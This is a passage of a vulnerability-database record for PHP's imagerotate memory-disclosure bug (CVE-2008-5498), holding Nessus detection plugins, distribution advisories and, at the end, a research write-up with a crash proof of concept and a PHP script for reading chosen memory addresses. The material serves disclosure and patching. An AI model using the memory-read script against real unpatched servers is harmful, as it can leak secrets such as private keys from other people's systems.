script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"11.0\", pkgname:\"php\", pkgver:\"5.2.9\", pkgarch:\"i486\", pkgnum:\"1_slack11.0\")) flag++;\n\nif (slackware_check(osver:\"12.0\", pkgname:\"php\", pkgver:\"5.2.9\", pkgarch:\"i486\", pkgnum:\"1_slack12.0\")) flag++;\n\nif (slackware_check(osver:\"12.1\", pkgname:\"php\", pkgver:\"5.2.9\", pkgarch:\"i486\", pkgnum:\"1_slack12.1\")) flag++;\n\nif (slackware_check(osver:\"12.2\", pkgname:\"php\", pkgver:\"5.2.9\", pkgarch:\"i486\", pkgnum:\"1_slack12.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"php\", pkgver:\"5.2.9\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-02-21T01:11:29", "bulletinFamily": "scanner", "description": "According to CVE-2008-5498 entry :\n\nArray index error in the 'imageRotate' function in PHP 5.2.8 and earlier allows context-dependent attackers to read the contents of arbitrary memory locations via a crafted value of the third argument (aka the 'bgd_color' or 'clrBack' argument) for an indexed image.", "modified": "2018-12-05T00:00:00", "id": "FREEBSD_PKG_58A3C266DB0111DDAE30001CC0377035.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=35583", "published": "2009-02-04T00:00:00", "title": "FreeBSD : php5-gd -- uninitialized memory information disclosure vulnerability (58a3c266-db01-11dd-ae30-001cc0377035)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35583);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/12/05 20:31:22\");\n\n script_cve_id(\"CVE-2008-5498\");\n script_bugtraq_id(33002);\n\n script_name(english:\"FreeBSD : php5-gd -- uninitialized memory information disclosure vulnerability (58a3c266-db01-11dd-ae30-001cc0377035)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"According to CVE-2008-5498 entry :\n\nArray index error in the 'imageRotate' function in PHP 5.2.8 and\nearlier allows context-dependent attackers to read the contents of\narbitrary memory locations via a crafted value of the third argument\n(aka the 'bgd_color' or 'clrBack' argument) for an indexed image.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.securiteam.com/unixfocus/6G00Y0ANFU.html\"\n );\n # https://vuxml.freebsd.org/freebsd/58a3c266-db01-11dd-ae30-001cc0377035.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?230ab5d8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/12/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/02/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"php5-gd<=5.2.8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:43:45", "bulletinFamily": "unix", "description": "[4.3.9-3.22.15]\n- fix merge of CVE-2008-3658 patch\n[4.3.9-3.22.14]\n- add security fixes for CVE-2008-3658, CVE-2008-3660,\n CVE-2008-5498, CVE-2008-5557, CVE-2009-0754 (#487360)\n- split out gd overflow2() and make global with sane symbol name", "modified": "2009-04-06T00:00:00", "published": "2009-04-06T00:00:00", "id": "ELSA-2009-0337", "href": "http://linux.oracle.com/errata/ELSA-2009-0337.html", "title": "php security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T01:40:36", "bulletinFamily": "unix", "description": "[5.1.6-23.2.el5]\n- ext/gd: fix overflow2 usage for CVE-2007-3996, CVE-2008-3658\n[5.1.6-23.1.el5]\n- add security fixes for CVE-2008-3658, CVE-2008-3660,\n CVE-2008-5498, CVE-2008-5557, CVE-2008-5814, and mbstring\n func_overload issue (#487369)", "modified": "2009-04-06T00:00:00", "published": "2009-04-06T00:00:00", "id": "ELSA-2009-0338", "href": "http://linux.oracle.com/errata/ELSA-2009-0338.html", "title": "php security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "centos": [{"lastseen": "2017-10-12T14:45:09", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2009:0337\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring extension. A\nremote attacker able to pass arbitrary input to a PHP script using mbstring\nconversion functions could cause the PHP interpreter to crash or,\npossibly, execute arbitrary code. (CVE-2008-5557)\n\nA flaw was found in the handling of the \"mbstring.func_overload\"\nconfiguration setting. A value set for one virtual host, or in a user's\n.htaccess file, was incorrectly applied to other virtual hosts on the same\nserver, causing the handling of multibyte character strings to not work\ncorrectly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\nscript allowed a remote attacker to load a carefully crafted font file, it\ncould cause the PHP interpreter to crash or, possibly, execute arbitrary\ncode. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause the PHP\ninterpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's imagerotate\nfunction. A remote attacker able to pass arbitrary values as the\n\"background color\" argument of the function could, possibly, view portions\nof the PHP interpreter's memory. (CVE-2008-5498)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web server\nmust be restarted for the changes to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-April/015718.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-April/015719.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-April/015720.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-April/015721.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-April/015722.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-April/015723.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-April/015806.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-April/015807.html\n\n**Affected packages:**\nphp\nphp-devel\nphp-domxml\nphp-gd\nphp-imap\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-ncurses\nphp-odbc\nphp-pear\nphp-pgsql\nphp-snmp\nphp-xmlrpc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-0337.html", "modified": "2009-04-20T19:49:21", "published": "2009-04-06T18:44:07", "href": "http://lists.centos.org/pipermail/centos-announce/2009-April/015718.html", "id": "CESA-2009:0337", "title": "php security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-10-03T18:25:58", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2009:0338\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring extension. A\nremote attacker able to pass arbitrary input to a PHP script using mbstring\nconversion functions could cause the PHP interpreter to crash or,\npossibly, execute arbitrary code. (CVE-2008-5557)\n\nA flaw was found in the handling of the \"mbstring.func_overload\"\nconfiguration setting. A value set for one virtual host, or in a user's\n.htaccess file, was incorrectly applied to other virtual hosts on the same\nserver, causing the handling of multibyte character strings to not work\ncorrectly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\nscript allowed a remote attacker to load a carefully crafted font file, it\ncould cause the PHP interpreter to crash or, possibly, execute arbitrary\ncode. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause the PHP\ninterpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's imagerotate\nfunction. A remote attacker able to pass arbitrary values as the\n\"background color\" argument of the function could, possibly, view portions\nof the PHP interpreter's memory. (CVE-2008-5498)\n\nA cross-site scripting flaw was found in a way PHP reported errors for\ninvalid cookies. If the PHP interpreter had \"display_errors\" enabled, a\nremote attacker able to set a specially-crafted cookie on a victim's system\ncould possibly inject arbitrary HTML into an error message generated by\nPHP. (CVE-2008-5814)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web server\nmust be restarted for the changes to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-April/015724.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-April/015725.html\n\n**Affected packages:**\nphp\nphp-bcmath\nphp-cli\nphp-common\nphp-dba\nphp-devel\nphp-gd\nphp-imap\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-ncurses\nphp-odbc\nphp-pdo\nphp-pgsql\nphp-snmp\nphp-soap\nphp-xml\nphp-xmlrpc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-0338.html", "modified": "2009-04-07T13:21:16", "published": "2009-04-07T13:21:16", "href": "http://lists.centos.org/pipermail/centos-announce/2009-April/015724.html", "id": "CESA-2009:0338", "title": "php security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-12-11T17:44:25", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring extension. A\nremote attacker able to pass arbitrary input to a PHP script using mbstring\nconversion functions could cause the PHP interpreter to crash or,\npossibly, execute arbitrary code. (CVE-2008-5557)\n\nA flaw was found in the handling of the \"mbstring.func_overload\"\nconfiguration setting. A value set for one virtual host, or in a user's\n.htaccess file, was incorrectly applied to other virtual hosts on the same\nserver, causing the handling of multibyte character strings to not work\ncorrectly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\nscript allowed a remote attacker to load a carefully crafted font file, it\ncould cause the PHP interpreter to crash or, possibly, execute arbitrary\ncode. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause the PHP\ninterpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's imagerotate\nfunction. A remote attacker able to pass arbitrary values as the\n\"background color\" argument of the function could, possibly, view portions\nof the PHP interpreter's memory. (CVE-2008-5498)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web server\nmust be restarted for the changes to take effect.", "modified": "2018-05-26T04:26:17", "published": "2009-04-06T04:00:00", "id": "RHSA-2009:0337", "href": "https://access.redhat.com/errata/RHSA-2009:0337", "type": "redhat", "title": "(RHSA-2009:0337) Moderate: php security update", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-12-11T17:40:52", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring extension. A\nremote attacker able to pass arbitrary input to a PHP script using mbstring\nconversion functions could cause the PHP interpreter to crash or,\npossibly, execute arbitrary code. (CVE-2008-5557)\n\nA flaw was found in the handling of the \"mbstring.func_overload\"\nconfiguration setting. A value set for one virtual host, or in a user's\n.htaccess file, was incorrectly applied to other virtual hosts on the same\nserver, causing the handling of multibyte character strings to not work\ncorrectly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\nscript allowed a remote attacker to load a carefully crafted font file, it\ncould cause the PHP interpreter to crash or, possibly, execute arbitrary\ncode. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause the PHP\ninterpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's imagerotate\nfunction. A remote attacker able to pass arbitrary values as the\n\"background color\" argument of the function could, possibly, view portions\nof the PHP interpreter's memory. (CVE-2008-5498)\n\nA cross-site scripting flaw was found in a way PHP reported errors for\ninvalid cookies. If the PHP interpreter had \"display_errors\" enabled, a\nremote attacker able to set a specially-crafted cookie on a victim's system\ncould possibly inject arbitrary HTML into an error message generated by\nPHP. (CVE-2008-5814)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web server\nmust be restarted for the changes to take effect.", "modified": "2017-09-08T12:08:43", "published": "2009-04-06T04:00:00", "id": "RHSA-2009:0338", "href": "https://access.redhat.com/errata/RHSA-2009:0338", "type": "redhat", "title": "(RHSA-2009:0338) Moderate: php security update", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-03-22T21:13:23", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\nHTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring extension. A\nremote attacker able to pass arbitrary input to a PHP script using mbstring\nconversion functions could cause the PHP interpreter to crash or, possibly,\nexecute arbitrary code. (CVE-2008-5557)\n\nA flaw was found in the handling of the \"mbstring.func_overload\"\nconfiguration setting. A value set for one virtual host, or in a user's\n.htaccess file, was incorrectly applied to other virtual hosts on the same\nserver, causing the handling of multibyte character strings to not work\ncorrectly. (CVE-2009-0754)\n\nA directory traversal flaw was found in PHP's ZipArchive::extractTo\nfunction. If PHP is used to extract a malicious ZIP archive, it could allow\nan attacker to write arbitrary files anywhere the PHP process has write\npermissions. (CVE-2008-5658)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a PHP\nscript allowed a remote attacker to load a carefully crafted font file, it\ncould cause the PHP interpreter to crash or, possibly, execute arbitrary\ncode. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause the PHP\ninterpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's imagerotate\nfunction. A remote attacker able to pass arbitrary values as the\n\"background color\" argument of the function could, possibly, view portions\nof the PHP interpreter's memory. (CVE-2008-5498)\n\nA cross-site scripting flaw was found in a way PHP reported errors for\ninvalid cookies. If the PHP interpreter had \"display_errors\" enabled, a\nremote attacker able to set a specially-crafted cookie on a victim's system\ncould possibly inject arbitrary HTML into an error message generated by\nPHP. (CVE-2008-5814)\n\nA flaw was found in PHP's json_decode function. A remote attacker could use\nthis flaw to create a specially-crafted string which could cause the PHP\ninterpreter to crash while being decoded in a PHP script. (CVE-2009-1271)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web server\nmust be restarted for the changes to take effect.", "modified": "2019-03-22T23:44:59", "published": "2009-04-14T04:00:00", "id": "RHSA-2009:0350", "href": "https://access.redhat.com/errata/RHSA-2009:0350", "type": "redhat", "title": "(RHSA-2009:0350) Moderate: php security update", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2018-08-31T00:36:56", "bulletinFamily": "unix", "description": "New php packages are available for Slackware 11.0, 12.0, 12.1, 12.2,\nand -current to fix security issues.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5498\n\n\nHere are the details from the Slackware 12.2 ChangeLog:\n\npatches/packages/php-5.2.9-i486-1_slack12.2.tgz: Upgraded to php-5.2.9.\n This update fixes a few security issues:\n - Fixed a crash on extract in zip when files or directories entry names\n contain a relative path.\n - Fixed security issue in imagerotate(), background colour isn't validated\n correctly with a non truecolour image. (CVE-2008-5498)\n Reported by Hamid Ebadi, APA Laboratory.\n - Fixed a segfault when malformed string is passed to json_decode().\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5498\n (* Security fix *)\n\nWhere to find the new packages:\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/extra/php5/php-5.2.9-i486-1_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/php-5.2.9-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/php-5.2.9-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/php-5.2.9-i486-1_slack12.2.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.2.9-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 11.0 package:\n0f37384585ba9b364f1fcf3260ed934a php-5.2.9-i486-1_slack11.0.tgz\n\nSlackware 12.0 package:\nb959206d13d76f58ef92489f569b7ff8 php-5.2.9-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\nbab5d4abc502a0a5dc1831943a5fd1a7 php-5.2.9-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\ne3c82331a09e0edb6be009e57b2569c9 php-5.2.9-i486-1_slack12.2.tgz\n\nSlackware -current package:\naf4de16b609b4e797dd0fc0a9f4c84d8 php-5.2.9-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg php-5.2.9-i486-1_slack12.2.tgz\n\nThen, restart the web server.", "modified": "2009-04-07T23:29:51", "published": "2009-04-07T23:29:51", "id": "SSA-2009-098-02", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.381314", "title": "php", "type": "slackware", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "seebug": [{"lastseen": "2017-11-19T16:21:02", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-66122", "id": "SSV:66122", "title": "PHP <= 5.2.8 gd library - imageRotate() Information Leak Vulnerability", "type": "seebug", "sourceData": "\n PHP - gd library - imageRotate()function Information Leak Vulnerability\r\n\r\nDiscovered by: Hamid Ebadi, \r\nFurther research and exploit: Mohammad R. Roohian\r\nCSIRT Team Members\r\nAmirkabir University APA Laboratory\r\n\r\nIntroduction\r\nPHP is a popular web programming language which isnormally used as a script engine in the server side.\r\nPHP 5 which is compiledwith gd library, includes a function called imageRotate() for rotating an imageresource by giving the rotation angle.\r\nThis function fills the resulted emptyareas with a given default coloring after rotation (clrBack). \r\nGd library works with both indexed images andtruecolor images. A truecolor pixel is a DWORD which stores the color value ofthe pixel which would be displayed without any change.\r\nIn indexed mode by using an index with a sizeof no more than 1 byte, the data wouldbe fetched from a color palette which consists of parallel arrays of colorbytes. The gd library uses the same data strcture for both of these image types(gdImageStruct).\r\nAn implementation error can cause information leakage from thememory of the PHP (or possible the web server) process.\r\n\r\nInformation leak vulnerabilities allow access to e.g. the Apache memory which might contain the private RSA key for the SSL cert.If an attacker is able to read it he can perform real man in the middle attackson all SSL connections. Aside from this in the days of ASLR, NX and canaryprotections it is often vital for the success of the exploit to know exactmemory addresses. (http://www.php-security.org/)\r\n\r\nVulnerableversion\r\nPHP <= 5.2.8\r\nCVE Candidate Number: CVE-2008-5498\r\n\r\nVulnerability\r\nThe imageRotate() function does not perform any validation check on the clrBack parameter which is used as an index for the above mentioned arrays with the size of 255 in the index image type.\r\nA correct validation check for the indexed images could be:\r\n\r\nfile: php-x.y.z/ext/gd/libgd/gd.c\r\n\r\n3129: gdImagePtr gdImageRotate (gdImagePtrsrc, double dAngle,\r\n int clrBack, int ignoretransparent) \r\n3130:{ \r\n3131: gdImagePtrpMidImg; \r\n3132: gdImagePtrrotatedImg;\r\n3133:\r\n3134: if(src == NULL) { \r\n3135: returnNULL; \r\n3136: }\r\n3137:+\r\n3137:+ // Index check\r\n3137:+ if (!src->truecolor) \r\n3137:+ clrBack &= 0xff; // Just keep the first byte\r\n3137:+\r\n3138: if(!gdImageTrueColor(src) && clrBack>=gdImageColorsTotal(src)) { \r\n3139: returnNULL; \r\n3140: }\r\n\r\nWhile rotating indexed image, gd retrives the final backcolor from 4 parallel arrays(red, green, blue and alpha) with length of 255 and uses clrBack as the indexof these arrays.\r\nBy providing a special clrBack value (more than 255) we can read almost any address in php memory:\r\n\r\nfile: php-x.y.z/ext/gd/libgd/gd.h\r\n\r\ntypedef struct gdImageStruct { \r\n \r\n --snip snip -- \r\n \r\n intred[gdMaxColors]; \r\n intgreen[gdMaxColors]; \r\n intblue[gdMaxColors]; \r\n \r\n --snip snip -- \r\n \r\n intalpha[gdMaxColors]; \r\n /*Truecolor flag and pixels. New 2.0 fields appear here at the \r\n endto minimize breakage of existing object code. */ \r\n inttrueColor; \r\n \r\n --snip snip -- \r\n \r\n} gdImage; \r\n\r\ntypedef gdImage * gdImagePtr; \r\n\r\nthen uses gdTrueColorAlpha macro to combinethe 4 mentioned values. gdTrueColorAlpha macro is implemented as following: \r\n\r\nfile: php-x.y.z/ext/gd/libgd/gd.h\r\n\r\n#define gdTrueColorAlpha(r, g, b, a) (((a)<< 24) + \\\r\n ((r)<< 16) + \\\r\n ((g)<< 8) + \\\r\n (b))\r\n\r\nThe final color value is the output of gdTrueColorAlpha macro which will be used as background color. gdTrueColorAlpha uses '+' (add) instead of '&'(and). While the '+' operator is slower, it also causes a security issue. By using a reverse function we can calculate almost any desired memory address.\r\n\r\nProof of concept:\r\nThis script would cause a segmentation faultbecause -9999999 would result in reading an invalid memory address in PHP process:\r\n\r\n<?php\r\n\r\n$img = imagecreate(5,5);\r\n$tmp = imagerotate ($img,5,-9999999);\r\n\r\n?>\r\nExploitation :\r\nWe need to provide a good clrBack to imageRotate()and then calculate the value of desired memory address by using imagecolorat() with arguments concerned with angles of the rotated image. Upper right would be a good spot (0, 0):\r\n\r\n<?php \r\n&special_index = /* index of the$address */\r\n$r=imagecreate(300,300); \r\n$gray = imagecolorallocate( $r,111,111,111); \r\nimagefilledrectangle($r,0,0,300,300,$gray);\r\n$tmp =imagerotate( $r, 30,&special_index ); \r\nimagePng( $tmp, "test.png" ); \r\n?>\r\n\r\n\r\n --------\r\n|f_b/\\\t |\r\n| / \\\t |\r\n| / \\ |\r\n|/image\t\\|\r\n|\\ /|\r\n| \\ / |\r\n| \\ /\t |\r\n| \\/\t |\r\n --------\r\n\r\nTo read encoded memory values from a desired address, we have to use the following script:\r\n\r\n<?php\r\n\r\n$address = /*address to read should bemultiply of 4 */\r\n$src = 0x84cde2c; \r\n// depends on the image size and phpscript length but is constant\r\n$index_b = -(int)(($src - $address +0x810)/4);\r\n\r\n$img = imagecreate(5,5);\r\n$tmp = imagerotate ($img,5,$index_b);\r\n$f_b = imagecolorat( $tmp,0,0);\r\n\r\n?>\r\n\r\nAfter passing $index_b as the index of arrays (red, green, blue and alphaarrays) and rotating $img (so that the values from the memory would be read), b variable takes the value of $address.\r\nThe color 